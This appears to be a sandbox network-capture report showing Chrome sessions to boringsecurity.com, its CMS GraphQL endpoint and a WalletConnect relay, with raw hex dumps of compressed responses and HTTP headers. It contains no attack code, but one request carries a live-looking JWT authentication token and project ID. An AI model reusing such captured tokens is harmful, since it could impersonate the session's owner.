                                                                          2023-12-10 16:44:54 UTC538INData Raw: d1 af 3b a4 ec 26 b1 8c e9 3d e6 8b 70 df b5 f6 f3 e7 2e c5 8d 1a 27 86 76 59 9e 74 a5 d3 c3 ab 53 62 8c b3 55 56 d4 5a 9a a8 34 d3 04 94 b5 a7 38 59 2c f1 6b c8 b7 03 52 4a 52 b6 a5 04 93 9a 63 72 d2 32 c8 a9 45 09 46 64 e5 17 9d 46 32 8d 8a ca ad a8 a7 14 aa c8 4f 52 98 ca 3a c4 30 6e c3 ac 44 06 25 bf 9f ae ea d8 c2 e6 ab 62 1a 60 c1 0c 68 1a 29 02 25 3a 8b 9b a8 94 6c 98 9e 77 18 ce 08 86 90 13 1c a2 d5 a1 0d a0 60 95 a6 90 00 21 28 22 52 88 4a 2d 09 46 4a 30 56 80 60 0c 00 06 20 01 49 16 38 ca 5a ba 5c ce 9e 2d 9e bb c9 7a de 13 91 e3 7d 9f 8c dc 51 94 7a 2f b2 bb 2d 22 e3 43 8b 4d 00 4a d2 29 a0 08 4a 24 71 ec c6 cc 2c ae c8 e9 77 38 7d de 5a 1d da 79 eb 2a df 9e 5b e4 a5 8a 66 bf 39 ad c5 c3 cd a7 29 d6 d1 59 d7 34 e1 d1 93 96 b7 59 4b 5d b6 f3 68
                                                                          Data Ascii: ;&=p.'vYtSbUVZ48Y,kRJRcr2EFdF2OR:0nD%b`h)%:lw`!("RJ-FJ0V` I8Z\-z}Qz/-"CMJ)J$q,w8}Zy*[f9)Y4YK]h
                                                                          2023-12-10 16:44:54 UTC4744INData Raw: 2d 78 fa 88 b1 6a a7 52 ba 37 e7 4a 5e a8 cb 44 2e ac 80 90 c0 89 09 ab 40 00 0c 11 24 20 00 21 38 22 40 0d 03 69 8c 11 21 31 89 83 4d 53 10 c4 c1 30 9c a1 39 6a e9 f3 7a 5c ed 9e b7 c9 7a ee 33 91 e3 7d a7 8b d4 8c 67 1e 8b ac aa 7a ae 2d 52 13 b2 f1 39 58 02 10 0a 49 2a cb ab 2a 42 ca ec 8e bf a8 f3 3e 9f 8e e4 87 cf 52 cd a3 3c 68 94 1e 6b cf 7d 06 96 96 6c b3 69 cd 5b 34 e5 71 bf 35 39 b5 9e c3 c7 75 5d 9b 5b eb 9a 28 ea cf 17 8f 5e dc 5c 76 ad aa dc dc 9e 5f d4 79 0f 47 3c 26 bc 9e ac 4e 13 91 54 ec b8 cc 6c 0b 7d 27 96 97 37 ae d7 c2 ee 78 fb 4d 06 35 8f 66 3d 76 31 4a 5a a1 65 56 68 1a 8d 4a 17 7a f8 72 29 ed 4b a6 78 cf b3 0b 79 bb 1d b9 51 06 b8 74 96 4d 79 79 6f 5a 6a 5f 9e f2 fa 7c cf a3 c2 7d ae 2f 52 5f a0 64 ae bf 0f 5e 9c 70 ac b7 67 a5 57
                                                                          Data Ascii: -xjR7J^D.@$ !8"@i!1MS09jz\z3}gz-R9XI**B>R<hk}li[4q59u][(^\v_yG<&NTl}'7xM5f=v1JZeVhJzr)KxyQtMyyoZj_|}/R_d^pgW
                                                                          2023-12-10 16:44:54 UTC5930INData Raw: 74 2f 54 98 20 16 29 b4 8a 9c 48 72 7a bc 59 96 04 80 03 68 59 4a 32 b4 00 60 43 94 67 2c 7a 9c be a7 3d 3f 65 e3 3d 9f 09 57 ce 7e 8d f3 9d 41 35 d6 a9 46 5b ca 94 65 51 68 2c 94 64 08 21 81 42 09 5e 7b e8 b2 ab 2b b3 2e c7 ac f1 dd ad 6f 9c 93 cf 94 df 81 b5 b6 38 6d 74 9a 4f 3c 42 16 cc b7 17 23 8a 07 72 72 49 c0 8b 7a 9c 7e c7 3f 4e a2 32 e1 ea 79 35 53 61 a6 b9 ef 3e 5b 57 46 3d a5 86 ea ab 0d 5d 3a 97 91 4f 43 25 b0 85 9c fd 3a 3c ce 2e ad f3 64 ed b8 3a b4 5f ce fa ac db 31 78 7b eb 52 25 e3 43 bb 8f bc c5 2e a1 2f 3e 5b d2 71 fb 58 f6 f3 0c 33 72 e9 cd ab 50 4d 44 73 e8 cf 5c 8e 2f 6b 8b db 1c bc fa 73 7a f9 cf d1 79 df 45 8d 77 b8 de 99 79 f5 e3 a3 ea e9 de 7c cc bd 20 79 de 8f 66 f9 68 b8 39 68 21 33 91 c7 eb f2 37 3d 16 ac ba b8 f4 8f 33 a7 cd
                                                                          Data Ascii: t/T )HrzYhYJ2`Cg,z=?e=W~A5F[eQh,d!B^{+.o8mtO<B#rrIz~?N2y5Sa>[WF=]:OC%:<.d:_1x{R%C./>[qX3rPMDs\/kszyEwy| yfh9h!37=3
                                                                          2023-12-10 16:44:54 UTC7116INData Raw: 09 aa e5 e1 e8 72 3a f0 ea fa de 57 4f cd a3 36 8c d8 d6 7f 27 ea 7c d7 a3 9c 3a 7c 8d bd 73 af 36 85 9b cc f6 5e 47 d7 f3 d1 7e 6d 1e 7d 92 80 a8 50 b9 da 84 be 13 99 d3 e6 7b 38 cf d6 f9 2f 5b 9d 77 b2 ea cd e6 de 88 8d 4e a7 0f b1 df 8a 81 1b 1a 8a 89 10 0f 1f d5 cf 7e 9d 7c 7d 0c 05 96 d7 6c b6 29 58 94 6b e6 f4 c1 b2 23 19 a2 ba ed ac a7 99 d4 e5 e9 75 06 df 6f 9f bd d0 94 79 f4 39 7d 2e 02 f4 f5 e6 a3 9b 66 1a f9 fc ef a1 8d 2f c5 d6 d3 91 83 96 bd 2f 1f 81 a3 ad dd dd b4 e2 00 c3 ce 79 2f 6b e6 fd 8d 3a b0 e9 eb e7 cb b3 16 8e 3d 78 dd 4e 4f 4f a5 f2 f1 6b d7 ce 6d 12 a6 81 82 59 08 18 04 9c 5c a2 11 3d 78 f5 dc 73 15 90 ab 7d b7 90 f4 b9 6c cd 7f 2a 33 27 9f a6 6a cf 7e 1b 27 3a 63 2e cb 39 f2 b3 a1 0c ac a1 06 75 24 12 97 53 75 02 28 00 2f a1 1d
                                                                          Data Ascii: r:WO6'|:|s6^G~m}P{8/[wN~|}l)Xk#uoy9}.f//y/k:=xNOOkmY\=xs}l*3'j~':c.9u$Su(/
                                                                          2023-12-10 16:44:54 UTC8302INData Raw: 2b 6c 5b 0f c4 70 18 30 ee 7f 1d ea e5 6f c4 ab a6 70 1c 2f 8e fc 6c ad 81 e6 f6 bb 8e 5c 2d b6 76 6d b5 6c 2d 80 e3 f9 7b 07 82 ec de 78 c5 d0 e3 ed 3b 95 76 6e 1f 92 18 95 f9 5b 0b 2b 2b 2b 6c 04 de 21 0d ae e7 0e ee e4 f6 fb fe 7d bb fb 36 df f9 5b 78 1e cb b0 1c 30 1e cb 76 bb 6c 84 36 ad 85 b0 08 70 b7 b3 da 4e 9f 6f 65 bc cb bb 78 2e db 5d ce 0e e1 6d ea ca db 63 99 dc fe d1 e0 38 0c 4f 0d 8b 22 80 4d e0 17 7f 61 dc c8 fb 43 68 ec 1f 77 ba ef f9 7b 07 86 0d ea 43 c5 bc 7d 9e ce e0 bb 37 0f c9 01 b1 f9 7b 23 83 78 8f 64 2f c9 dc 9e e7 e7 db da ef f9 f7 f6 4f 0e c3 87 b5 dd 9b 5d b6 7b fb 5d 9b c3 d9 0a 4e 41 ed 0e 65 dd bc 17 6f 63 bb b8 77 f6 47 17 73 8f 68 f0 1c bd f0 3e c3 78 2e fe c3 b9 91 f6 86 d1 d8 77 b4 36 bf 2f 60 f0 c1 bd 48 b8 b7 9b d9 ec
                                                                          Data Ascii: +l[p0op/l\-vml-{x;vn[+++l!}6[x0vl6pNoex.]mc8O"MaChw{C}7{#xd/O]{]NAeocwGsh>x.w6/`H
                                                                          2023-12-10 16:44:54 UTC3578INData Raw: bf 6b b8 9e 0d c3 f3 c0 73 23 ec d2 0f 45 95 bd 97 6e 2f dc ec 18 2e 5e f2 4b ba 68 6e 31 5d e3 82 95 f9 ce cb 79 59 ec b8 d9 be f3 b9 47 0f dc aa 3e 30 e1 83 76 7f 2d be ea 5e 28 2a 3e b4 81 da 58 d0 41 03 e9 1a d0 c1 25 1c 32 4d bb 32 f0 bd f0 ca 1a f7 50 b5 cd 8c 8b 3d dc 29 37 c0 2e 5c aa c5 e9 5a 55 10 b8 8a 16 c6 fc eb 3a d5 68 4f a8 8c 46 26 66 59 aa 18 d8 5b 51 99 1b be 2c e5 cd 8d fa d5 2d 3f 50 16 c6 d6 5f 2b 1c 1e d6 30 ba 33 9b 50 b3 eb 56 49 f4 2b 79 25 7d d7 e3 e1 3f 2a 91 b9 28 e1 e8 2a af 8c 4b 5a 0b e0 bb 5d 0b cb 58 d6 e3 fd 91 89 f9 58 77 54 df 18 a7 75 67 eb a0 a3 be 78 e4 12 b4 c4 e6 a8 ec e9 44 8f 68 32 48 54 f6 08 31 ce 5e 98 d8 f7 99 0a a3 86 d8 56 f1 7f 51 33 96 4e 94 fc 92 74 e9 78 2f ec 27 f5 aa 1c 44 c4 dd 7e f9 3a 6d 4f 54 87
                                                                          Data Ascii: ks#En/.^Khn1]yYG>0v-^(*>XA%2M2P=)7.\ZU:hOF&fY[Q,-?P_+03PVI+y%}?*(*KZ]XXwTugxDh2HT1^VQ3Ntx/'D~:mOT
                                                                          2023-12-10 16:44:54 UTC10674INData Raw: 16 57 2c af 55 3c 92 75 21 17 a8 73 ec 63 7f a9 df 19 ef 60 9d 82 f3 d5 53 3a 48 a4 86 56 2a 57 6b 51 55 51 0a 98 e9 7c 3a 2a 54 f2 36 2a 99 92 77 9d 29 38 87 d9 80 fa 8a 70 16 77 20 e2 78 3a 98 b6 26 7c 97 93 7d 83 c3 13 c3 68 a8 4f aa 37 69 c7 db 07 21 b7 dd 9d 44 ed e7 01 8f 7f f2 41 2d 4d ab 95 a9 f5 0d 79 c2 41 ea fb 07 72 85 fb 70 ef 80 e6 d8 ef ec bf 82 0a 1e 7b e5 91 7d 72 9a d9 b3 4f 4f 1d 43 62 a1 8a 12 1f 62 78 3b 73 5a 4b 99 20 70 7b 23 74 ef f4 43 1d 34 40 bd ad 0d 0a 5a 8d 07 78 88 fa b0 f2 de eb 8a a6 37 a7 c2 7e 83 78 61 55 2e a4 98 99 03 c8 dc 31 95 c9 ce cc a3 64 b9 db 20 27 d9 70 b8 a3 9f 5a 35 07 4f 00 8f cb c4 f0 a7 f8 f5 3f 28 75 aa be 4a 0b c2 76 2a fe 3b ba d4 fd 44 65 6f 9c 04 39 b5 c4 65 a5 78 75 35 67 c5 62 67 c8 51 f2 54 74 2a
                                                                          Data Ascii: W,U<u!sc`S:HV*WkQUQ|:*T6*w)8pw x:&|}hO7i!DA-MyArp{}rOOCbbx;sZK p{#tC4@Zx7~xaU.1d 'pZ5O?(uJv*;Deo9exu5gbgQTt*


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          134192.168.2.54986413.250.153.1154435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:54 UTC1058OUTGET /?auth=eyJhbGciOiJFZERTQSIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJkaWQ6a2V5Ono2TWt1ajg3ZWNja1ZldXE1dnVrd1c4cmFFWHl4NmFZY0p0VnpkY2RreFQ4emJ0OSIsInN1YiI6IjEyNjY0MmZkZWU0MTUyMTU4NjlhZTQ0NGNmNzkzM2YwYzFkNzRhMThjMDVhZGQzY2QxM2ZhMWUzNjlkYWYxYmYiLCJhdWQiOiJ3c3M6Ly9yZWxheS53YWxsZXRjb25uZWN0Lm9yZyIsImlhdCI6MTcwMjIyNjY5MiwiZXhwIjoxNzAyMzEzMDkyfQ.1cdWlWM_k4Egl8dbgBWJwMqmYNHDEPqGfktqbR-LXzvQoayVE_WGHl-GT43OzYRqvyWdGNzrj8-v8VvzNl1SBg&projectId=6fc490f91addcb4e7b2ceeabf6f0bb3b&ua=wc-2%2Fjs-2.9.2%2Fwindows10-chrome-117.0.0%2Fbrowser%3Aboringsecurity.com&useOnCloseEvent=true HTTP/1.1
                                                                          Host: relay.walletconnect.org
                                                                          Connection: Upgrade
                                                                          Pragma: no-cache
                                                                          Cache-Control: no-cache
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Upgrade: websocket
                                                                          Origin: https://boringsecurity.com
                                                                          Sec-WebSocket-Version: 13
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Sec-WebSocket-Key: SebBSbLUDBhsof6UkFUlqQ==
                                                                          Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                          2023-12-10 16:44:56 UTC126INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 34 33 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 35 20 47 4d 54 0d 0a 0d 0a
                                                                          Data Ascii: HTTP/1.1 400 Bad Requestcontent-type: text/plain; charset=utf-8content-length: 43date: Sun, 10 Dec 2023 16:44:55 GMT
                                                                          2023-12-10 16:44:56 UTC43INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 20 68 65 61 64 65 72 20 64 69 64 20 6e 6f 74 20 69 6e 63 6c 75 64 65 20 27 75 70 67 72 61 64 65 27
                                                                          Data Ascii: Connection header did not include 'upgrade'


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          135192.168.2.54986875.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:54 UTC520OUTGET /parseGridNftDataToCanvas.worker.js HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          Origin: https://boringsecurity.com
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: same-origin
                                                                          Sec-Fetch-Dest: worker
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          If-None-Match: "0922e34df9afec7660bfdaeb43061ea3-ssl"
                                                                          2023-12-10 16:44:55 UTC322INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 34 20 4e 6f 74 20 4d 6f 64 69 66 69 65 64 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 35 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 30 39 32 32 65 33 34 64 66 39 61 66 65 63 37 36 36 30 62 66 64 61 65 62 34 33 30 36 31 65 61 33 2d 73 73 6c 22 0d 0a 53 65 72 76 65 72 3a 20 4e 65 74 6c 69 66 79 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 0d
                                                                          Data Ascii: HTTP/1.1 304 Not ModifiedCache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitDate: Sun, 10 Dec 2023 16:44:55 GMTEtag: "0922e34df9afec7660bfdaeb43061ea3-ssl"Server: NetlifyStrict-Transport-Security: max-age=31536000


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          136192.168.2.54986923.92.19.1444435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:55 UTC354OUTGET /graphql/ HTTP/1.1
                                                                          Host: cms.boringsecurity.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:55 UTC985INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 4f 72 69 67 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 3b 69 6d 67 2d 73 72 63 20 27 73 65 6c 66 27 20 64 61 74 61 3a 20 63 64 6e 2e
                                                                          Data Ascii: HTTP/1.1 400 Bad RequestServer: nginx/1.18.0Date: Sun, 10 Dec 2023 16:45:01 GMTContent-Type: text/plain; charset=utf-8Content-Length: 18Connection: closeVary: OriginContent-Security-Policy: connect-src 'self' https:;img-src 'self' data: cdn.
                                                                          2023-12-10 16:44:55 UTC18INGET query missing.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          137192.168.2.54987075.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:55 UTC520OUTGET /parseGridNftDataToCanvas.worker.js HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          Origin: https://boringsecurity.com
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: same-origin
                                                                          Sec-Fetch-Dest: worker
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          If-None-Match: "0922e34df9afec7660bfdaeb43061ea3-ssl"
                                                                          2023-12-10 16:44:55 UTC322INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 34 20 4e 6f 74 20 4d 6f 64 69 66 69 65 64 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 35 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 30 39 32 32 65 33 34 64 66 39 61 66 65 63 37 36 36 30 62 66 64 61 65 62 34 33 30 36 31 65 61 33 2d 73 73 6c 22 0d 0a 53 65 72 76 65 72 3a 20 4e 65 74 6c 69 66 79 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 0d
                                                                          Data Ascii: HTTP/1.1 304 Not ModifiedCache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitDate: Sun, 10 Dec 2023 16:44:55 GMTEtag: "0922e34df9afec7660bfdaeb43061ea3-ssl"Server: NetlifyStrict-Transport-Security: max-age=31536000


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          138192.168.2.54987123.92.19.1444435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:55 UTC354OUTGET /graphql/ HTTP/1.1
                                                                          Host: cms.boringsecurity.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:56 UTC985INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 4f 72 69 67 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 3b 69 6d 67 2d 73 72 63 20 27 73 65 6c 66 27 20 64 61 74 61 3a 20 63 64 6e 2e
                                                                          Data Ascii: HTTP/1.1 400 Bad RequestServer: nginx/1.18.0Date: Sun, 10 Dec 2023 16:45:02 GMTContent-Type: text/plain; charset=utf-8Content-Length: 18Connection: closeVary: OriginContent-Security-Policy: connect-src 'self' https:;img-src 'self' data: cdn.
                                                                          2023-12-10 16:44:56 UTC18INGET query missing.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          139192.168.2.54987275.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:56 UTC520OUTGET /parseGridNftDataToCanvas.worker.js HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          Origin: https://boringsecurity.com
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: same-origin
                                                                          Sec-Fetch-Dest: worker
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          If-None-Match: "0922e34df9afec7660bfdaeb43061ea3-ssl"
                                                                          2023-12-10 16:44:56 UTC322INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 34 20 4e 6f 74 20 4d 6f 64 69 66 69 65 64 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 36 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 30 39 32 32 65 33 34 64 66 39 61 66 65 63 37 36 36 30 62 66 64 61 65 62 34 33 30 36 31 65 61 33 2d 73 73 6c 22 0d 0a 53 65 72 76 65 72 3a 20 4e 65 74 6c 69 66 79 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 0d
                                                                          Data Ascii: HTTP/1.1 304 Not ModifiedCache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitDate: Sun, 10 Dec 2023 16:44:56 GMTEtag: "0922e34df9afec7660bfdaeb43061ea3-ssl"Server: NetlifyStrict-Transport-Security: max-age=31536000


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          140192.168.2.54987323.92.19.1444435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:57 UTC354OUTGET /graphql/ HTTP/1.1
                                                                          Host: cms.boringsecurity.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:57 UTC985INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 4f 72 69 67 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 3b 69 6d 67 2d 73 72 63 20 27 73 65 6c 66 27 20 64 61 74 61 3a 20 63 64 6e 2e
                                                                          Data Ascii: HTTP/1.1 400 Bad RequestServer: nginx/1.18.0Date: Sun, 10 Dec 2023 16:45:03 GMTContent-Type: text/plain; charset=utf-8Content-Length: 18Connection: closeVary: OriginContent-Security-Policy: connect-src 'self' https:;img-src 'self' data: cdn.
                                                                          2023-12-10 16:44:57 UTC18INGET query missing.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          141192.168.2.54987475.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:57 UTC520OUTGET /parseGridNftDataToCanvas.worker.js HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          Origin: https://boringsecurity.com
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: same-origin
                                                                          Sec-Fetch-Dest: worker
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          If-None-Match: "0922e34df9afec7660bfdaeb43061ea3-ssl"
